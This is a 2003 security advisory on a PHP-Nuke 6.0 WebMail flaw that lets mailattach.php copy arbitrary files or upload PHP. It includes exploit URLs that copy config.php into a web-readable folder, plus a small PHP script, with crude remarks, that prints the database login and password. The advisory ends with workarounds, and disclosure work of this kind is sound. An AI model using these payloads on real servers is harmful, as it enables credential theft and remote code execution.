21th Jan 2003 [SBWID-5940]
COMMAND
PHP-Nuke allows remote copy of arbitrary files
SYSTEMS AFFECTED
PHP-nuke 6.0 with WebMail 0.9.3 is confirmed vulnerable
PROBLEM
Karol Wiêsek [appelast-at-bsquad.sm.pl] found :
--snip--
Remote attacker could transfer to server his own file or copy arbitrary
file from system to accessible directory. The result of such acts could
be remote execution commands under privileges of httpd server, or
retrieving important information such as database login and password.
Attacker even don't have to be registered user to make an attack,but
needs writable directory.
The crux of the problem lies in WebMail module, and exactly int
mailattach.php file. This Module is default attached to PHP-nuke 6.0 (
current ). And even this module don't have to be active to make an
attack successful, because it can be accessed directly ( no modules.php
in $PHP_SELF check present in this file).
snip from mailatach.php
if (isset($userfile) AND $userfile != "none") {
if (ini_get(file_uploads) AND $attachments == 1) {
$updir = "tmp";
@copy($userfile, "$updir/$userfile_name");
Sample attack which allows an attacker to grab database password and
login.
http://target.server/modules/WebMail/mailattach.php?userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=1
Using mailattach.php attacker could upload file with any extension,
which allow him to upload any .php file and execute arbitrary PHP code.
To successfully exploiting this vulnerability writable directory is
needed. When module is active, the tmp and attachmenst should be
writable to allow module work properly.
ANALYSIS
========
Remote exploitation allows an attacker to execute arbitrary commands
and code under the privileges of the web server. This also opens the
door to privilege escalation attacks. Attacker could also debug httpd
child processes and grab secret information like users pop3 passwords
used to authentication to remote pop3 server in WebMail module. Having
database password he also has access to all information about users.
Update (02 March 2003)
======
Lorenzo Hernandez Garcia-Hierro [[email protected]]
[http://novappc.com) adds :
CODE:
http://NUKESITE/modules/WebMail/mailattach.php?%20userfile=[DIR TO PHP
FILE ]&userfile_name=../attachments/h4ckz.php&attachments=1
DESCRIPTION:
[DIR TO PHP FILE]:
This is the directory of your php file that prints the content of the
variables in config.php , the code of the file is:
<?php
include ("../../config.php")
echo 'DB User:',"$dbuname";
echo '<br><br>';
echo 'Host for Fuck:',"$dbhost";
echo '<br><br>';
echo 'Password:',"$dbpass";
echo '<br><br>';
echo 'Thats all folks my little fucker';
?>
This file load variables from config.php to the h4ckz.php file end
prints all content of the variables using echo function of php.
You only must access the temporal file in the server in the directory
that you put in the &userfile_name of the xploit url.
WHAT CAN BE HAPPEN?
All the passwords of config.php are given , the attacker can be use it
for modify, rename or DELETE the database depending of the privileges
and the situation of the web admin tool , like phpnuke and the access
configuration of database , acept tcp/ip connects or not accept.
ONLY AFFECT WEBMAIL?
No, all the modules that upload files can be unsafely because you can
modify the variables of the xploit url to run with other module that
upload files.
SOLUTION
Workaround
==========
As suggested by Lorenzo Hernandez Garcia-Hierro :
FIRST: Modify code of all the files that upload files of course for die
when the file is called remotely ( QUERY_STRING remote and REFERER
remote) , you an find more info about this in the modules.php file.
SECOND: Be sure (optional) that the php-nuke not use a root user for
database.
THIRD: Modify mysql/postgre/etc config for only accept connects of
localhost and the web admin apps. like php admin ( on remote servers )
cant run with your server ;-) FOURTH: Activate only the modules that
you use, Xd.